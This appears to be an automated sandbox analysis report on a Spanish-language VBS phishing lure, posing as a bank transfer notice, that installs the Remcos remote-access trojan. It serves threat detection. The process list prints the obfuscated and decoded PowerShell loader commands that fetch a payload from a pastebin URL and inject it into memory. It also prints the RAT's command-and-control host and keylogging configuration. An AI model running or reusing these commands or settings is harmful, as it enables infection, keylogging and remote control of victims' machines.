Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-es -
resource tags
arch:x64arch:x86image:win10v2004-20230220-eslocale:es-esos:windows10-2004-x64systemwindows -
submitted
21-04-2023 10:00
Static task
static1
Behavioral task
behavioral1
Sample
enviado comprobante detallado Aviso de Transferencia Realizada en cuenta empresarial.vbs
Resource
win10-20230220-es
Behavioral task
behavioral2
Sample
enviado comprobante detallado Aviso de Transferencia Realizada en cuenta empresarial.vbs
Resource
win10v2004-20230220-es
General
-
Target
enviado comprobante detallado Aviso de Transferencia Realizada en cuenta empresarial.vbs
-
Size
149KB
-
MD5
26aeb38c880f8d8e02878107abdc2f54
-
SHA1
257adf0cefde925b9426500bc43f0e87501e1894
-
SHA256
13d68dbe8b6307b80456e6ac0f47cbef9cf2c1f99131894373145b1c8dfb66bc
-
SHA512
27a81426dc8175d9e9002149209312cf567323963d0c4397c56e7fecec0f4dbeb967c4d16412f5bc61b8d2726ec20849440e5d7b8e1202988bbed1b3fe7f2a74
-
SSDEEP
1536:8Kd99CObiNCocEW1aJK66n5yhtW0/5JpWn4cNIg0BfbUZlu9gISsR3MQF6a:8Kdo9JK6X/vcmg0Bfcq
Malware Config
Extracted
https://pastebin.com/raw/fNYFJXVy
Extracted
remcos
MiloJueves1
contificoseguro.con-ip.com:2500
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logslmilo.dat
-
keylog_flag
false
-
keylog_folder
logslivemilo1
-
mouse_option
false
-
mutex
Rmcau1milo1-AZN4WS
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 7 1204 powershell.exe 13 1204 powershell.exe 17 1204 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1204 set thread context of 60 1204 powershell.exe 87 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4996 powershell.exe 4996 powershell.exe 1812 powershell.exe 1812 powershell.exe 1204 powershell.exe 1204 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 60 InstallUtil.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4996 powershell.exe Token: SeDebugPrivilege 1812 powershell.exe Token: SeDebugPrivilege 1204 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 60 InstallUtil.exe -
Suspicious use of WriteProcessMemory 18 IoCs
description pid Process procid_target PID 1320 wrote to memory of 4996 1320 WScript.exe 81 PID 1320 wrote to memory of 4996 1320 WScript.exe 81 PID 1320 wrote to memory of 1812 1320 WScript.exe 84 PID 1320 wrote to memory of 1812 1320 WScript.exe 84 PID 1812 wrote to memory of 1204 1812 powershell.exe 86 PID 1812 wrote to memory of 1204 1812 powershell.exe 86 PID 1204 wrote to memory of 60 1204 powershell.exe 87 PID 1204 wrote to memory of 60 1204 powershell.exe 87 PID 1204 wrote to memory of 60 1204 powershell.exe 87 PID 1204 wrote to memory of 60 1204 powershell.exe 87 PID 1204 wrote to memory of 60 1204 powershell.exe 87 PID 1204 wrote to memory of 60 1204 powershell.exe 87 PID 1204 wrote to memory of 60 1204 powershell.exe 87 PID 1204 wrote to memory of 60 1204 powershell.exe 87 PID 1204 wrote to memory of 60 1204 powershell.exe 87 PID 1204 wrote to memory of 60 1204 powershell.exe 87 PID 1204 wrote to memory of 60 1204 powershell.exe 87 PID 1204 wrote to memory of 60 1204 powershell.exe 87
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\enviado comprobante detallado Aviso de Transferencia Realizada en cuenta empresarial.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Copy-Item -Path *.vbs -Destination C:\Windows\Temp\edDWr.vbs2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABpAEcAVAB4AFIAIAA9ACAAJwBSAEEASABMAEgAJwA7AFsAQgB5A***QAZQBbAF0AXQAgACQAUwByAEIARQB1ACAAPQAgAFsAcwB5A***MAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhA***MAZQA2ADQAUwB0A***IAaQBuAGcAKAAgACgATgBlA***cALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuA***QAKQAuAEQAbwB3AG4AbABvAGEAZABTA***QAcgBpAG4AZwAoACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlA***QALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvA***cAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoA***QAdABwA***MAOgAvAC8AcABhA***MAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAGYATgBZAEYASgBYAFYAeQAnACkAIAApACAAKQA7AFsAcwB5A***MAdABlAG0ALgBBA***AAcABEAG8AbQBhAGkAbgBdADoAOgBDA***UAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAUwByAEIARQB1ACkALgB***AGUAdABUA***kAcABlACgAJwBDAGQAVwBEAGQAQgAuAEQASwBlAFMAdgBsACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBOAG4ASQBhAFUAcQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwAwAC8AegBxAG8AZQBMAC8AZAAvAGUAZQAuAGUAdABzAGEAcAAvAC8AOgBzA***AAdAB0AGgAJwAgACwAIAAkAGkARwBUA***gAUgAgACwAIAAnAEMAYQBsAGUAbgBkAGEAcgBpAG8AMgAnACwAIAAnADAAJwAsACAAJwAxACcALAAgACcAJwAgACkAKQA7AA==';$pvNxls = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('***','H') ) );$pvNxls = $pvNxls.replace('RAHLH', 'C:\Users\Admin\AppData\Local\Temp\enviado comprobante detallado Aviso de Transferencia Realizada en cuenta empresarial.vbs');powershell -command $pvNxls2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$iGTxR = 'C:\Users\Admin\AppData\Local\Temp\enviado comprobante detallado Aviso de Transferencia Realizada en cuenta empresarial.vbs';[Byte[]] $SrBEu = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/fNYFJXVy') ) );[system.AppDomain]::CurrentDomain.Load($SrBEu).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke($null, [object[]] ('0/zqoeL/d/ee.etsap//:sptth' , $iGTxR , 'Calendario2', '0', '1', '' ));"3⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:60
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD53ca1082427d7b2cd417d7c0b7fd95e4e
SHA1b0482ff5b58ffff4f5242d77330b064190f269d3
SHA25631f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f
SHA512bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3
-
Filesize
64B
MD5235a8eb126d835efb2e253459ab8b089
SHA1293fbf68e6726a5a230c3a42624c01899e35a89f
SHA2565ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686
SHA512a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82